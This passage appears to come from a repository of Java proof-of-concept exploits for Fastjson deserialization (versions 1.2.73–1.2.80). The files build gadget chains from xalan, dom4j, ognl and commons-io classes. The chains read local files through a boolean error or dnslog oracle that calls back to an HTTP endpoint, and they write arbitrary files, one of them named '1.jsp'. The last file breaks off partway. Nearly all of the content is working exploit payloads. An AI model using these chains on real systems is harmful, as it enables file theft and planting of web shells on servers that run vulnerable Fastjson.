23 |         String poc1 = "\r\n"
24 |         		+ "{\r\n"
25 |         		+ "	\"su14\": {\r\n"
26 |         		+ "		\"@type\": \"java.lang.Exception\",\r\n"
27 |         		+ "		\"@type\": \"ognl.OgnlException\"\r\n"
28 |         		+ "	},\r\n"
29 |         		+ "	\"su15\": {\r\n"
30 |         		+ "		\"@type\": \"java.lang.Class\",\r\n"
31 |         		+ "		\"val\": {\r\n"
32 |         		+ "			\"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
33 |         		+ "			{\r\n"
34 |         		+ "				\"@type\": \"java.lang.String\"\r\n"
35 |         		+ "				\"@type\": \"ognl.OgnlException\",\r\n"
36 |         		+ "				\"_evaluation\": \"\"\r\n"
37 |         		+ "			}\r\n"
38 |         		+ "		},\r\n"
39 |         		+ "		\"su16\": {\r\n"
40 |         		+ "			\"@type\": \"ognl.Evaluation\",\r\n"
41 |         		+ "			\"node\": {\r\n"
42 |         		+ "				\"@type\": \"ognl.ASTMethod\",\r\n"
43 |         		+ "				\"p\": {\r\n"
44 |         		+ "					\"@type\": \"ognl.OgnlParser\",\r\n"
45 |         		+ "					\"stream\": {\r\n"
46 |         		+ "  \"@type\":\"org.apache.commons.io.input.BOMInputStream\",\r\n"
47 |         		+ "  \"delegate\":{\r\n"
48 |         		+ "    \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
49 |         		+ "    \"input\":{\r\n"
50 |         		+ "      \"@type\": \"org.apache.commons.codec.binary.Base64InputStream\",\r\n"
51 |         		+ "      \"in\":{\r\n"
52 |         		+ "        \"@type\":\"org.apache.commons.io.input.CharSequenceInputStream\",\r\n"
53 |         		+ "        \"charset\":\"utf-8\",\r\n"
54 |         		+ "        \"bufferSize\": 1024,\r\n"
55 |     			+ "        \"s\":{\"@type\":\"java.lang.String\"\""+test+"\"\r\n"
56 |         		+ "      },\r\n"
57 |         		+ "      \"doEncode\":false,\r\n"
58 |         		+ "      \"lineLength\":1024,\r\n"
59 |         		+ "      \"lineSeparator\":\"5ZWKCg==\",\r\n"
60 |         		+ "      \"decodingPolicy\":0\r\n"
61 |         		+ "    },\r\n"
62 |         		+ "    \"branch\":{\r\n"
63 |         		+ "      \"@type\":\"org.eclipse.core.internal.localstore.SafeFileOutputStream\",\r\n"
64 |         		+ "      \"targetPath\":\"1.txt\"\r\n"
65 |         		+ "    },\r\n"
66 |         		+ "    \"closeBranch\":true\r\n"
67 |         		+ "  },\r\n"
68 |         		+ "  \"include\":true,\r\n"
69 |         		+ "  \"boms\":[{\r\n"
70 |         		+ "                  \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
71 |         		+ "                  \"charsetName\": \"UTF-8\",\r\n"
72 |     			+ "                  \"bytes\":"+Arrays.toString(testbs)+"\r\n"
73 |         		+ "                }],\r\n"
74 |         		+ "}\r\n"
75 |         		+ "				}\r\n"
76 |         		+ "			}\r\n"
77 |         		+ "		},\r\n"
78 |         		+ "		\"su17\": {\r\n"
79 |         		+ "			\"$ref\": \"$.su16.node.p.stream\"\r\n"
80 |         		+ "		},\r\n"
81 |         		+ "		\"su18\": {\r\n"
82 |         		+ "			\"$ref\": \"$.su17.bOM.bytes\"\r\n"
83 |         		+ "		}\r\n"
84 |         		+ "	}";
85 |         System.out.println(poc1);
86 |         JSON.parseObject(poc1);
87 |     }
88 | }
89 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson27_xalan_dom4j_io_read_error_dnslog.java:
--------------------------------------------------------------------------------
  1 | package com.shiro.vuln.fastjson;
  2 | import java.io.InputStream;
  3 | import java.net.URL;
  4 | import java.util.Arrays;
  5 | import java.util.Base64;
  6 | 
  7 | import com.alibaba.fastjson.JSON;
  8 | 
  9 | 
 10 | public class Fastjson27_xalan_dom4j_io_read_error_dnslog {
 11 |     public static void main(String[] args) throws Exception {
 12 |     	String url = "file:///D:/";
 13 |     	InputStream input = new URL(url).openStream();
 14 |     	byte[] bs = new byte[input.available()];
 15 |     	input.read(bs);
 16 |     	String test = Base64.getEncoder().encodeToString(bs);
 17 |     	byte[] testbs = test.getBytes();
 18 |         System.out.println(Arrays.toString(bs));
 19 |         System.out.println(new String(bs));
 20 |     	
 21 |         //依赖1.2.73-1.2.80 xalan-2.7.2 dom4j-2.1.3  commons-io-2.2 根据报错不一样或者是否有dnslog/httplog来布尔读文件
 22 |         String poc1 = "{\r\n"
 23 |         		+ "		\"@type\": \"java.lang.Exception\",\r\n"
 24 |         		+ "		\"@type\": \"org.apache.xml.dtm.DTMConfigurationException\",\"locator\":{}\r\n"
 25 |         		+ "}";
 26 |         String poc2 = "{\r\n"
 27 |         		+ "		\"@type\": \"java.lang.Class\",\r\n"
 28 |         		+ "		\"val\": {\r\n"
 29 |         		+ "			\"@type\": \"java.lang.String\" {\r\n"
 30 |         		+ "				\"@type\": \"java.util.Locale\",\r\n"
 31 |         		+ "				\"val\": {\r\n"
 32 |         		+ "					\"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
 33 |         		+ "					{\r\n"
 34 |         		+ "						\"@type\": \"java.lang.String\"\r\n"
 35 |         		+ "						\"@type\": \"org.apache.xml.dtm.DTMConfigurationException\",\r\n"
 36 |         		+ "						\"locator\": {}\r\n"
 37 |         		+ "					}\r\n"
 38 |         		+ "				}\r\n"
 39 |         		+ "			}";
 40 |         String poc3 = "{\r\n"
 41 |         		+ "	\"su14\": {\r\n"
 42 |         		+ "		\"@type\": \"javax.xml.transform.SourceLocator\",\r\n"
 43 |         		+ "		\"@type\": \"org.apache.xpath.objects.XNodeSetForDOM\",\r\n"
 44 |         		+ "		\"nodeIter\": {\r\n"
 45 |         		+ "			\"@type\": \"org.apache.xpath.NodeSet\"\r\n"
 46 |         		+ "		},\r\n"
 47 |         		+ "		\"xctxt\": {\r\n"
 48 |         		+ "			\"@type\": \"org.apache.xpath.XPathContext\",\r\n"
 49 |         		+ "			\"primaryReader\": {\r\n"
 50 |         		+ "				\"@type\": \"org.dom4j.io.XMLWriter\",\r\n"
 51 |         		+ "				\"entityResolver\": {\r\n"
 52 |         		+ "					\"@type\": \"org.dom4j.io.SAXContentHandler\",\r\n"
 53 |         		+ "					\"inputSource\": {\r\n"
 54 |         		+ "						\"byteStream\": {\r\n"
 55 |         		+ "							\"@type\": \"java.io.InputStream\"\r\n"
 56 |         		+ "						}\r\n"
 57 |         		+ "					}\r\n"
 58 |         		+ "				}\r\n"
 59 |         		+ "			}\r\n"
 60 |         		+ "		}\r\n"
 61 |         		+ "	}\r\n"
 62 |         		+ "}";
 63 |         
 64 |         String poc4 = "[{\"su15\":{\r\n"
 65 |         		+ "\"@type\": \"java.io.InputStream\",\r\n"
 66 |         		+ "						\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
 67 |         		+ "						\"delegate\": {\r\n"
 68 |         		+ "							\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
 69 |         		+ "							\"reader\": {\r\n"
 70 |         		+ "								\"@type\": \"jdk.nashorn.api.scripting.URLReader\",\r\n"
 71 |    /*文件路径*/	+ "								\"url\": \"file:///D:/\"\r\n"
 72 |         		+ "							},\r\n"
 73 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
 74 |         		+ "							\"bufferSize\": 1024\r\n"
 75 |         		+ "						},\r\n"
 76 |         		+ "						\"boms\": [{\r\n"
 77 |         		+ "							\"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
 78 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
 79 |         		+ "							\"bytes\": [\r\n"
 80 |    /*文件bytes*/	+ "								36,82\r\n"
 81 |         		+ "							]\r\n"
 82 |         		+ "						}]\r\n"
 83 |         		+ "					}},\r\n"
 84 |         		+ "		{\r\n"
 85 |         		+ "			\"su16\": {\r\n"
 86 |         		+ "				\"$ref\": \"$[0].su15.bOM.bytes\"\r\n"
 87 |         		+ "			}\r\n"
 88 |         		+ "		},{\r\n"
 89 |         		+ "			\"su17\": {\r\n"
 90 |         		+ "			\"@type\": \"java.io.InputStream\",\r\n"
 91 |         		+ "							\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
 92 |         		+ "							\"delegate\": {\r\n"
 93 |         		+ "								\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
 94 |         		+ "								\"reader\": {\r\n"
 95 |         		+ "									\"@type\": \"org.apache.commons.io.input.CharSequenceReader\",\r\n"
 96 |         		+ "									\"charSequence\": {\r\n"
 97 |         		+ "										\"@type\": \"java.lang.String\" {\r\n"
 98 |         		+ "											\"$ref\": \"$[1].su16\"\r\n"
 99 |         		+ "										},\r\n"
100 |         		+ "										\"start\": 0,\r\n"
101 |         		+ "										\"end\": 0\r\n"
102 |         		+ "									},\r\n"
103 |         		+ "									\"charsetName\": \"UTF-8\",\r\n"
104 |         		+ "									\"bufferSize\": 1024\r\n"
105 |         		+ "								},\r\n"
106 |         		+ "								\"boms\": [{\r\n"
107 |         		+ "									\"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
108 |         		+ "									\"charsetName\": \"UTF-8\",\r\n"
109 |         		+ "									\"bytes\": [1]\r\n"
110 |         		+ "								}]\r\n"
111 |         		+ "							}\r\n"
112 |         		+ "			},{\r\n"
113 |         		+ "			\"su18\": {\r\n"
114 |         		+ "			\"@type\": \"java.io.InputStream\",\r\n"
115 |         		+ "							\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
116 |         		+ "							\"delegate\": {\r\n"
117 |         		+ "								\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
118 |         		+ "								\"reader\": {\r\n"
119 |         		+ "									\"@type\": \"jdk.nashorn.api.scripting.URLReader\",\r\n"
120 |       /*dnslog*/+ "									\"url\": \"http://127.0.0.1:5667\"\r\n"
121 |         		+ "								},\r\n"
122 |         		+ "								\"charsetName\": \"UTF-8\",\r\n"
123 |         		+ "								\"bufferSize\": 1024\r\n"
124 |         		+ "							},\r\n"
125 |         		+ "							\"boms\": [{\r\n"
126 |         		+ "								\"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
127 |         		+ "								\"charsetName\": \"UTF-8\",\r\n"
128 |         		+ "								\"bytes\": [\r\n"
129 |         		+ "									49\r\n"
130 |         		+ "								]\r\n"
131 |         		+ "							}]\r\n"
132 |         		+ "						}\r\n"
133 |         		+ "		},\r\n"
134 |         		+ "		{\r\n"
135 |         		+ "			\"su19\": {\r\n"
136 |         		+ "				\"$ref\": \"$[3].su18.bOM.bytes\"\r\n"
137 |         		+ "			}\r\n"
138 |         		+ "		}]";
139 |         
140 |         System.out.println(poc1);
141 |         System.out.println(poc2);
142 |         System.out.println(poc3);
143 |         System.out.println(poc4);
144 |         try {
145 |         	JSON.parseObject(poc1);
146 | 		} catch (Exception e) {
147 | 		}
148 |         JSON.parseObject(poc2);
149 |         JSON.parseObject(poc3);
150 |         JSON.parseObject(poc4);
151 |         
152 |     }
153 | }
154 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson28_xalan_dom4j_io_read_print.java:
--------------------------------------------------------------------------------
  1 | package com.shiro.vuln.fastjson;
  2 | import java.io.InputStream;
  3 | import java.net.URL;
  4 | import java.util.Arrays;
  5 | import java.util.Base64;
  6 | 
  7 | import com.alibaba.fastjson.JSON;
  8 | import com.alibaba.fastjson.parser.ParserConfig;
  9 | 
 10 | 
 11 | public class Fastjson28_xalan_dom4j_io_read_print {
 12 |     public static void main(String[] args) throws Exception {
 13 |     	String url = "file:///D:/";
 14 |     	InputStream input = new URL(url).openStream();
 15 |     	byte[] bs = new byte[input.available()];
 16 |     	input.read(bs);
 17 |     	String test = Base64.getEncoder().encodeToString(bs);
 18 |     	byte[] testbs = test.getBytes();
 19 |         System.out.println(Arrays.toString(bs));
 20 |         System.out.println(new String(bs));
 21 |     	
 22 |         //依赖1.2.73-1.2.80 xalan-2.7.2 dom4j-2.1.3  commons-io-2.2 需回显，根据回显不一样(关注su15字段)布尔读文件
 23 |         String poc1 = "{\r\n"
 24 |         		+ "		\"@type\": \"java.lang.Exception\",\r\n"
 25 |         		+ "		\"@type\": \"org.apache.xml.dtm.DTMConfigurationException\",\"locator\":{}\r\n"
 26 |         		+ "}";
 27 |         String poc2 = "{\r\n"
 28 |         		+ "		\"@type\": \"java.lang.Class\",\r\n"
 29 |         		+ "		\"val\": {\r\n"
 30 |         		+ "			\"@type\": \"java.lang.String\" {\r\n"
 31 |         		+ "				\"@type\": \"java.util.Locale\",\r\n"
 32 |         		+ "				\"val\": {\r\n"
 33 |         		+ "					\"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
 34 |         		+ "					{\r\n"
 35 |         		+ "						\"@type\": \"java.lang.String\"\r\n"
 36 |         		+ "						\"@type\": \"org.apache.xml.dtm.DTMConfigurationException\",\r\n"
 37 |         		+ "						\"locator\": {}\r\n"
 38 |         		+ "					}\r\n"
 39 |         		+ "				}\r\n"
 40 |         		+ "			}";
 41 |         String poc3 = "{\r\n"
 42 |         		+ "	\"su14\": {\r\n"
 43 |         		+ "		\"@type\": \"javax.xml.transform.SourceLocator\",\r\n"
 44 |         		+ "		\"@type\": \"org.apache.xpath.objects.XNodeSetForDOM\",\r\n"
 45 |         		+ "		\"nodeIter\": {\r\n"
 46 |         		+ "			\"@type\": \"org.apache.xpath.NodeSet\"\r\n"
 47 |         		+ "		},\r\n"
 48 |         		+ "		\"xctxt\": {\r\n"
 49 |         		+ "			\"@type\": \"org.apache.xpath.XPathContext\",\r\n"
 50 |         		+ "			\"primaryReader\": {\r\n"
 51 |         		+ "				\"@type\": \"org.dom4j.io.XMLWriter\",\r\n"
 52 |         		+ "				\"entityResolver\": {\r\n"
 53 |         		+ "					\"@type\": \"org.dom4j.io.SAXContentHandler\",\r\n"
 54 |         		+ "					\"inputSource\": {\r\n"
 55 |         		+ "						\"byteStream\": {\r\n"
 56 |         		+ "							\"@type\": \"java.io.InputStream\"\r\n"
 57 |         		+ "						}\r\n"
 58 |         		+ "					}\r\n"
 59 |         		+ "				}\r\n"
 60 |         		+ "			}\r\n"
 61 |         		+ "		}\r\n"
 62 |         		+ "	}\r\n"
 63 |         		+ "}";
 64 |         
 65 |         String poc4 = "{\"su15\":{\r\n"
 66 |         		+ "						\"@type\": \"java.io.InputStream\",\r\n"
 67 |         		+ "						\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
 68 |         		+ "						\"delegate\": {\r\n"
 69 |         		+ "							\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
 70 |         		+ "							\"reader\": {\r\n"
 71 |         		+ "								\"@type\": \"jdk.nashorn.api.scripting.URLReader\",\r\n"
 72 |     /*文件位置*/+ "								\"url\": \"file:///D:/\"\r\n"
 73 |         		+ "							},\r\n"
 74 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
 75 |         		+ "							\"bufferSize\": 1024\r\n"
 76 |         		+ "						},\r\n"
 77 |         		+ "						\"boms\": [{\r\n"
 78 |         		+ "							\"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
 79 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
 80 |         		+ "							\"bytes\": [\r\n"
 81 |    /*文件bytes*/+ "								36,82\r\n"
 82 |         		+ "							]\r\n"
 83 |         		+ "						}]\r\n"
 84 |         		+ "					}}";
 85 |         
 86 |         System.out.println(poc1);
 87 |         System.out.println(poc2);
 88 |         System.out.println(poc3);
 89 |         System.out.println(poc4);
 90 |         try {
 91 |         	JSON.parseObject(poc1);
 92 | 		} catch (Exception e) {
 93 | 		}
 94 |         JSON.parseObject(poc2);
 95 |         JSON.parseObject(poc3);
 96 |         System.out.println(JSON.parseObject(poc4));
 97 |         
 98 |     }
 99 | }
100 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson29_xalan_dom4j_io_write_1.java:
--------------------------------------------------------------------------------
  1 | package com.shiro.vuln.fastjson;
  2 | 
  3 | import com.alibaba.fastjson.JSON;
  4 | 
  5 | 
  6 | public class Fastjson29_xalan_dom4j_io_write_1 {
  7 |     public static void main(String[] args) throws Exception {
  8 |     	String code = "test";
  9 |         for (int i = 0; i < 8200; i++) {
 10 | 			code += "a";
 11 | 		}
 12 |         //依赖1.2.73-1.2.80 xalan-2.7.2 dom4j-2.1.3  commons-io-2.0-2.6
 13 |         String poc1 = "{\r\n"
 14 |         		+ "		\"@type\": \"java.lang.Exception\",\r\n"
 15 |         		+ "		\"@type\": \"org.apache.xml.dtm.DTMConfigurationException\",\"locator\":{}\r\n"
 16 |         		+ "}";
 17 |         String poc2 = "{\r\n"
 18 |         		+ "		\"@type\": \"java.lang.Class\",\r\n"
 19 |         		+ "		\"val\": {\r\n"
 20 |         		+ "			\"@type\": \"java.lang.String\" {\r\n"
 21 |         		+ "				\"@type\": \"java.util.Locale\",\r\n"
 22 |         		+ "				\"val\": {\r\n"
 23 |         		+ "					\"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
 24 |         		+ "					{\r\n"
 25 |         		+ "						\"@type\": \"java.lang.String\"\r\n"
 26 |         		+ "						\"@type\": \"org.apache.xml.dtm.DTMConfigurationException\",\r\n"
 27 |         		+ "						\"locator\": {}\r\n"
 28 |         		+ "					}\r\n"
 29 |         		+ "				}\r\n"
 30 |         		+ "			}";
 31 |         String poc3 = "{\r\n"
 32 |         		+ "	\"su14\": {\r\n"
 33 |         		+ "		\"@type\": \"javax.xml.transform.SourceLocator\",\r\n"
 34 |         		+ "		\"@type\": \"org.apache.xpath.objects.XNodeSetForDOM\",\r\n"
 35 |         		+ "		\"nodeIter\": {\r\n"
 36 |         		+ "			\"@type\": \"org.apache.xpath.NodeSet\"\r\n"
 37 |         		+ "		},\r\n"
 38 |         		+ "		\"xctxt\": {\r\n"
 39 |         		+ "			\"@type\": \"org.apache.xpath.XPathContext\",\r\n"
 40 |         		+ "			\"primaryReader\": {\r\n"
 41 |         		+ "				\"@type\": \"org.dom4j.io.XMLWriter\",\r\n"
 42 |         		+ "				\"entityResolver\": {\r\n"
 43 |         		+ "					\"@type\": \"org.dom4j.io.SAXContentHandler\",\r\n"
 44 |         		+ "					\"inputSource\": {\r\n"
 45 |         		+ "						\"byteStream\": {\r\n"
 46 |         		+ "							\"@type\": \"java.io.InputStream\"\r\n"
 47 |         		+ "						}\r\n"
 48 |         		+ "					}\r\n"
 49 |         		+ "				}\r\n"
 50 |         		+ "			}\r\n"
 51 |         		+ "		}\r\n"
 52 |         		+ "	}\r\n"
 53 |         		+ "}";
 54 |         
 55 |         String poc4 = "{\r\n"
 56 |         		+ "	\"su16\": {\r\n"
 57 |         		+ "		\"@type\": \"java.io.InputStream\",\r\n"
 58 |         		+ "		\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
 59 |         		+ "		\"delegate\": {\r\n"
 60 |         		+ "			\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
 61 |         		+ "			\"reader\": {\r\n"
 62 |         		+ "				\"@type\": \"org.apache.commons.io.input.XmlStreamReader\",\r\n"
 63 |         		+ "				\"is\": {\r\n"
 64 |         		+ "					\"@type\": \"org.apache.commons.io.input.TeeInputStream\",\r\n"
 65 |         		+ "					\"input\": {\r\n"
 66 |         		+ "						\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
 67 |         		+ "						\"reader\": {\r\n"
 68 |         		+ "							\"@type\": \"org.apache.commons.io.input.CharSequenceReader\",\r\n"
 69 |         		+ "        \"charSequence\":{\"@type\":\"java.lang.String\"\""+code+"\"\r\n"
 70 |         		+ "      },\r\n"
 71 |         		+ "      \"charsetName\":\"UTF-8\",\r\n"
 72 |         		+ "      \"bufferSize\":1024\r\n"
 73 |         		+ "						},\r\n"
 74 |         		+ "						\"branch\": {\r\n"
 75 |         		+ "							\"@type\": \"org.apache.commons.io.output.WriterOutputStream\",\r\n"
 76 |         		+ "							\"writer\": {\r\n"
 77 |         		+ "								\"@type\": \"org.apache.commons.io.output.FileWriterWithEncoding\",\r\n"
 78 |         		+ "								\"file\": \"1.jsp\",\r\n"
 79 |         		+ "								\"encoding\": \"UTF-8\",\r\n"
 80 |         		+ "								\"append\": false\r\n"
 81 |         		+ "							},\r\n"
 82 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
 83 |         		+ "							\"bufferSize\": 1024,\r\n"
 84 |         		+ "							\"writeImmediately\": true\r\n"
 85 |         		+ "						},\r\n"
 86 |         		+ "						\"closeBranch\": true\r\n"
 87 |         		+ "					},\r\n"
 88 |         		+ "					\"httpContentType\": \"text/xml\",\r\n"
 89 |         		+ "					\"lenient\": false,\r\n"
 90 |         		+ "					\"defaultEncoding\": \"UTF-8\"\r\n"
 91 |         		+ "				},\r\n"
 92 |         		+ "				\"charsetName\": \"UTF-8\",\r\n"
 93 |         		+ "				\"bufferSize\": 1024\r\n"
 94 |         		+ "			},\r\n"
 95 |         		+ "			\"boms\": [{\r\n"
 96 |         		+ "				\"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
 97 |         		+ "				\"charsetName\": \"UTF-8\",\r\n"
 98 |         		+ "				\"bytes\": [\r\n"
 99 |         		+ "					36, 82\r\n"
100 |         		+ "				]\r\n"
101 |         		+ "			}]\r\n"
102 |         		+ "		},\r\n"
103 |         		+ "		\"su17\": {\r\n"
104 |         		+ "			\"@type\": \"java.io.InputStream\",\r\n"
105 |         		+ "			\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
106 |         		+ "			\"delegate\": {\r\n"
107 |         		+ "				\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
108 |         		+ "				\"reader\": {\r\n"
109 |         		+ "					\"@type\": \"org.apache.commons.io.input.XmlStreamReader\",\r\n"
110 |         		+ "					\"is\": {\r\n"
111 |         		+ "						\"@type\": \"org.apache.commons.io.input.TeeInputStream\",\r\n"
112 |         		+ "						\"input\": {\r\n"
113 |         		+ "							\"$ref\": \"$.su16.delegate.reader.is.input\"\r\n"
114 |         		+ "						},\r\n"
115 |         		+ "						\"branch\": {\r\n"
116 |         		+ "							\"$ref\": \"$.su16.delegate.reader.is.branch\"\r\n"
117 |         		+ "						},\r\n"
118 |         		+ "						\"closeBranch\": true\r\n"
119 |         		+ "					},\r\n"
120 |         		+ "					\"httpContentType\": \"text/xml\",\r\n"
121 |         		+ "					\"lenient\": false,\r\n"
122 |         		+ "					\"defaultEncoding\": \"UTF-8\"\r\n"
123 |         		+ "				},\r\n"
124 |         		+ "				\"charsetName\": \"UTF-8\",\r\n"
125 |         		+ "				\"bufferSize\": 1024\r\n"
126 |         		+ "			},\r\n"
127 |         		+ "			\"boms\": [{\r\n"
128 |         		+ "				\"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
129 |         		+ "				\"charsetName\": \"UTF-8\",\r\n"
130 |         		+ "				\"bytes\": [\r\n"
131 |         		+ "					36, 82\r\n"
132 |         		+ "				]\r\n"
133 |         		+ "			}]\r\n"
134 |         		+ "		},\r\n"
135 |         		+ "		\"su18\": {\r\n"
136 |         		+ "			\"@type\": \"java.io.InputStream\",\r\n"
137 |         		+ "			\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
138 |         		+ "			\"delegate\": {\r\n"
139 |         		+ "				\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
140 |         		+ "				\"reader\": {\r\n"
141 |         		+ "					\"@type\": \"org.apache.commons.io.input.XmlStreamReader\",\r\n"
142 |         		+ "					\"is\": {\r\n"
143 |         		+ "						\"@type\": \"org.apache.commons.io.input.TeeInputStream\",\r\n"
144 |         		+ "						\"input\": {\r\n"
145 |         		+ "							\"$ref\": \"$.su16.delegate.reader.is.input\"\r\n"
146 |         		+ "						},\r\n"
147 |         		+ "						\"branch\": {\r\n"
148 |         		+ "							\"$ref\": \"$.su16.delegate.reader.is.branch\"\r\n"
149 |         		+ "						},\r\n"
150 |         		+ "						\"closeBranch\": true\r\n"
151 |         		+ "					},\r\n"
152 |         		+ "					\"httpContentType\": \"text/xml\",\r\n"
153 |         		+ "					\"lenient\": false,\r\n"
154 |         		+ "					\"defaultEncoding\": \"UTF-8\"\r\n"
155 |         		+ "				},\r\n"
156 |         		+ "				\"charsetName\": \"UTF-8\",\r\n"
157 |         		+ "				\"bufferSize\": 1024\r\n"
158 |         		+ "			},\r\n"
159 |         		+ "			\"boms\": [{\r\n"
160 |         		+ "				\"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
161 |         		+ "				\"charsetName\": \"UTF-8\",\r\n"
162 |         		+ "				\"bytes\": [\r\n"
163 |         		+ "					36, 82\r\n"
164 |         		+ "				]\r\n"
165 |         		+ "			}]\r\n"
166 |         		+ "		},\r\n"
167 |         		+ "		\"su19\": {\r\n"
168 |         		+ "			\"@type\": \"java.io.InputStream\",\r\n"
169 |         		+ "			\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
170 |         		+ "			\"delegate\": {\r\n"
171 |         		+ "				\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
172 |         		+ "				\"reader\": {\r\n"
173 |         		+ "					\"@type\": \"org.apache.commons.io.input.XmlStreamReader\",\r\n"
174 |         		+ "					\"is\": {\r\n"
175 |         		+ "						\"@type\": \"org.apache.commons.io.input.TeeInputStream\",\r\n"
176 |         		+ "						\"input\": {\r\n"
177 |         		+ "							\"$ref\": \"$.su16.delegate.reader.is.input\"\r\n"
178 |         		+ "						},\r\n"
179 |         		+ "						\"branch\": {\r\n"
180 |         		+ "							\"$ref\": \"$.su16.delegate.reader.is.branch\"\r\n"
181 |         		+ "						},\r\n"
182 |         		+ "						\"closeBranch\": true\r\n"
183 |         		+ "					},\r\n"
184 |         		+ "					\"httpContentType\": \"text/xml\",\r\n"
185 |         		+ "					\"lenient\": false,\r\n"
186 |         		+ "					\"defaultEncoding\": \"UTF-8\"\r\n"
187 |         		+ "				},\r\n"
188 |         		+ "				\"charsetName\": \"UTF-8\",\r\n"
189 |         		+ "				\"bufferSize\": 1024\r\n"
190 |         		+ "			},\r\n"
191 |         		+ "			\"boms\": [{\r\n"
192 |         		+ "				\"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
193 |         		+ "				\"charsetName\": \"UTF-8\",\r\n"
194 |         		+ "				\"bytes\": [\r\n"
195 |         		+ "					36, 82\r\n"
196 |         		+ "				]\r\n"
197 |         		+ "			}]\r\n"
198 |         		+ "		}\r\n"
199 |         		+ "	}";
200 |         
201 |         System.out.println(poc1);
202 |         System.out.println(poc2);
203 |         System.out.println(poc3);
204 |         System.out.println(poc4);
205 |         try {
206 |         	JSON.parseObject(poc1);
207 | 		} catch (Exception e) {
208 | 		}
209 |         JSON.parseObject(poc2);
210 |         JSON.parseObject(poc3);
211 |         JSON.parseObject(poc4);
212 |         
213 |     }
214 | }
215 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson30_xalan_dom4j_io_write_2.java:
--------------------------------------------------------------------------------
  1 | package com.shiro.vuln.fastjson;
  2 | 
  3 | import com.alibaba.fastjson.JSON;
  4 | 
  5 | 
  6 | public class Fastjson30_xalan_dom4j_io_write_2 {
  7 |     public static void main(String[] args) throws Exception {
  8 |     	String code = "test";
  9 |         for (int i = 0; i < 8200; i++) {
 10 | 			code += "a";
 11 | 		}
 12 |     	
 13 |         //依赖1.2.73-1.2.80 xalan-2.7.2 dom4j-2.1.3  commons-io-2.7/2.8
 14 |         String poc1 = "{\r\n"
 15 |         		+ "		\"@type\": \"java.lang.Exception\",\r\n"
 16 |         		+ "		\"@type\": \"org.apache.xml.dtm.DTMConfigurationException\",\"locator\":{}\r\n"
 17 |         		+ "}";
 18 |         String poc2 = "{\r\n"
 19 |         		+ "		\"@type\": \"java.lang.Class\",\r\n"
 20 |         		+ "		\"val\": {\r\n"
 21 |         		+ "			\"@type\": \"java.lang.String\" {\r\n"
 22 |         		+ "				\"@type\": \"java.util.Locale\",\r\n"
 23 |         		+ "				\"val\": {\r\n"
 24 |         		+ "					\"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
 25 |         		+ "					{\r\n"
 26 |         		+ "						\"@type\": \"java.lang.String\"\r\n"
 27 |         		+ "						\"@type\": \"org.apache.xml.dtm.DTMConfigurationException\",\r\n"
 28 |         		+ "						\"locator\": {}\r\n"
 29 |         		+ "					}\r\n"
 30 |         		+ "				}\r\n"
 31 |         		+ "			}";
 32 |         String poc3 = "{\r\n"
 33 |         		+ "	\"su14\": {\r\n"
 34 |         		+ "		\"@type\": \"javax.xml.transform.SourceLocator\",\r\n"
 35 |         		+ "		\"@type\": \"org.apache.xpath.objects.XNodeSetForDOM\",\r\n"
 36 |         		+ "		\"nodeIter\": {\r\n"
 37 |         		+ "			\"@type\": \"org.apache.xpath.NodeSet\"\r\n"
 38 |         		+ "		},\r\n"
 39 |         		+ "		\"xctxt\": {\r\n"
 40 |         		+ "			\"@type\": \"org.apache.xpath.XPathContext\",\r\n"
 41 |         		+ "			\"primaryReader\": {\r\n"
 42 |         		+ "				\"@type\": \"org.dom4j.io.XMLWriter\",\r\n"
 43 |         		+ "				\"entityResolver\": {\r\n"
 44 |         		+ "					\"@type\": \"org.dom4j.io.SAXContentHandler\",\r\n"
 45 |         		+ "					\"inputSource\": {\r\n"
 46 |         		+ "						\"byteStream\": {\r\n"
 47 |         		+ "							\"@type\": \"java.io.InputStream\"\r\n"
 48 |         		+ "						}\r\n"
 49 |         		+ "					}\r\n"
 50 |         		+ "				}\r\n"
 51 |         		+ "			}\r\n"
 52 |         		+ "		}\r\n"
 53 |         		+ "	}\r\n"
 54 |         		+ "}";
 55 |         
